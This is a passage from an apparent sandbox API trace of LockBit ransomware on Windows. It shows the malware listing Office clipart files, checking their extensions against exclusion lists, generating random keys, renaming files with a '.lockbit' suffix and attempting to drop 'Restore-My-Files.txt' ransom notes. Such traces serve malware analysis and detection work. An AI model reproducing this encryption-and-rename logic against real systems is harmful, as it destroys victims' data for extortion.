(in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned=".WMF" [0144.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.463] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.463] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.464] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.464] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.lockbit") returned 72 [0144.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.465] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.465] malloc (_Size=0x40068) returned 0x3df0008 [0144.465] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6752) returned 1 [0144.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.466] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.473] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.473] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.475] free (_Block=0x1fa2ed8) [0144.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.476] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.476] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.476] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151063.WMF", cAlternateFileName="")) returned 1 [0144.476] lstrcmpiW (lpString1=".", lpString2="J0151063.WMF") returned -1 [0144.476] lstrcmpiW (lpString1="..", lpString2="J0151063.WMF") returned -1 [0144.476] PathFindExtensionW (pszPath="J0151063.WMF") returned=".WMF" [0144.476] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.476] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.477] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.477] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151063.WMF") returned 1 [0144.478] lstrcmpiW (lpString1="ntldr", lpString2="J0151063.WMF") returned 1 [0144.478] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151063.WMF") returned 1 [0144.478] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151063.WMF") returned -1 [0144.478] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151063.WMF") returned -1 [0144.478] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151063.WMF") returned 1 [0144.478] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151063.WMF") returned -1 [0144.478] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.478] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned=".WMF" [0144.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.478] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.478] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.479] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.479] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.lockbit") returned 72 [0144.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.480] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.480] malloc (_Size=0x40068) returned 0x3df0008 [0144.480] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10632) returned 1 [0144.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.482] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.487] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.487] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.487] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0144.489] free (_Block=0x1fa2ed8) [0144.489] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.489] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.489] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151067.WMF", cAlternateFileName="")) returned 1 [0144.489] lstrcmpiW (lpString1=".", lpString2="J0151067.WMF") returned -1 [0144.489] lstrcmpiW (lpString1="..", lpString2="J0151067.WMF") returned -1 [0144.489] PathFindExtensionW (pszPath="J0151067.WMF") returned=".WMF" [0144.489] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.490] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.490] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151067.WMF") returned 1 [0144.491] lstrcmpiW (lpString1="ntldr", lpString2="J0151067.WMF") returned 1 [0144.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151067.WMF") returned 1 [0144.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151067.WMF") returned -1 [0144.491] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151067.WMF") returned -1 [0144.491] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151067.WMF") returned 1 [0144.491] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151067.WMF") returned -1 [0144.491] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.491] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned=".WMF" [0144.491] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.492] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.492] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.493] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.493] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.lockbit") returned 72 [0144.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.494] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.494] malloc (_Size=0x40068) returned 0x3df0008 [0144.494] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13204) returned 1 [0144.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.495] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.501] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.501] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.503] free (_Block=0x1fa2ed8) [0144.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.503] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.504] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3418, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151073.WMF", cAlternateFileName="")) returned 1 [0144.504] lstrcmpiW (lpString1=".", lpString2="J0151073.WMF") returned -1 [0144.504] lstrcmpiW (lpString1="..", lpString2="J0151073.WMF") returned -1 [0144.504] PathFindExtensionW (pszPath="J0151073.WMF") returned=".WMF" [0144.504] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.504] 